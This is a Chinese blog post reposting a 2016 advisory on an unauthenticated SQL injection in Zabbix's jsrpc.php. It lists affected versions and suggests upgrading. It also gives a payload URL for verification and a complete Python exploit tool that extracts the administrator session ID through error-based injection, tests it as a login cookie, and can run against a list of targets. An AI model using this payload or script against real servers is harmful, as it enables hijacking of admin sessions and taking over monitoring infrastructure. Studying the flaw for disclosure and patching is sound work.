最新文章:

首页 运维技术

zabbix 再爆高危 SQL 注入漏洞,可获系统权限(更新利用工具)

发布时间:2016年08月19日 评论数:1 阅读数:5013



    漏洞概述




    zabbix是一个开源的企业级性能监控解决方案。近日,zabbix的jsrpc的profileIdx2参数存在insert方式的SQL注入漏洞,攻击者无需授权登陆即可登陆zabbix管理系统,也可通过script等功能轻易直接获取zabbix服务器的操作系统权限。

    官方网站:

    http://www.zabbix.com

    影响程度

    攻击成本:低

    危害程度:高

    是否登陆:不需要

    影响范围:2.2.x, 3.0.0-3.0.3。(其他版本未经测试)

    漏洞测试

    在您的zabbix的地址后面加上如下url:

    jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17

    输出结果,如下表示漏洞存在:

    补充

    以上为仅为漏洞验证测试方式。

    攻击者可以通过进一步构造语句进行错误型sql注射,无需获取和破解加密的管理员密码。

    有经验的攻击者可以直接通过获取admin的sessionid来根据结构算法构造sid,替换cookie直接以管理员身份登陆。

    修复方案

    尽快升级到最新版,据说3.0.4版本已经修补。

    安全提示

    监控系统监控着每个企业的核心资产,一旦被黑客入侵控制,等同帮助黑客进一步渗透企业敞开了大门。

    请大家务必重视,并尽快修补此漏洞。

    漏洞报告详情:http://seclists.org/fulldisclosure/2016/Aug/82

    来自:FreeBuf黑客与极客(FreeBuf.COM)

    相关链接

    • 近期发布的另外一个需要登录的SQL注入漏洞    Zabbix 3.0.3 SQL Injection Vulnerabilityhttps://www.exploit-db.com/exploits/40237/

      Zabbix 关于该漏洞相关信息    https://support.zabbix.com/browse/ZBX-11023

      利用工具,可自动判断Session是否可用:(2016-8-18 13点更新,作者:黄雨)

      import urllib,sys,urllib2,urllib
      def cookie(url):
          poc='/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select 1 from (select count(*),concat(floor(rand(0)*2), (select sessionid from sessions where userid=1 and status=0 limit 1))x from information_schema.character_sets group by x)y)&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color='
          body= urllib.urlopen(url+poc).read()
          cookie=body.split('Duplicate entry')[1].split('for key')[0][3:-2]
          return cookie
      def test(cookie,url):
          url=url+'proxies.php'
          req=urllib2.Request(url)
          cook="zbx_sessionid=%s" % cookie
          req.add_header('Cookie', cook)
          response=urllib2.urlopen(req)
          data=response.read()
          if data.find('Access denied.') < 0:
              print "OK-->",cookie
          else:
              print 'ERROR'
      if len(sys.argv)==4:
          for i in open(sys.argv[3]).readlines():
              print i
              test(cookie(i),i)
      else:
          print sys.argv[1]
          test(cookie(sys.argv[1]),sys.argv[1])1.jpg 
    • CNNVD:关于Zabbix漏洞情况的通报    http://bobao.360.cn/news/detail/3468.html




二维码加载中...
本文作者:Mr.linus      文章标题: zabbix 再爆高危 SQL 注入漏洞,可获系统权限(更新利用工具)
本文地址:http://www.90qj.com/390.html  本文已经被百度收录,点击查看详情
版权声明:若无注明,本文皆为“挨踢 Blog”原创,转载请保留文章出处。
挤眼 亲亲 咆哮 开心 想想 可怜 糗大了 委屈 哈哈 小声点 右哼哼 左哼哼 疑问 坏笑 赚钱啦 悲伤 耍酷 勾引 厉害 握手 耶 嘻嘻 害羞 鼓掌 馋嘴 抓狂 抱抱 围观 威武 给力
提交评论

清空信息
关闭评论
line、
line、2016-08-22 16:52回复
#1
很强势挨踢博客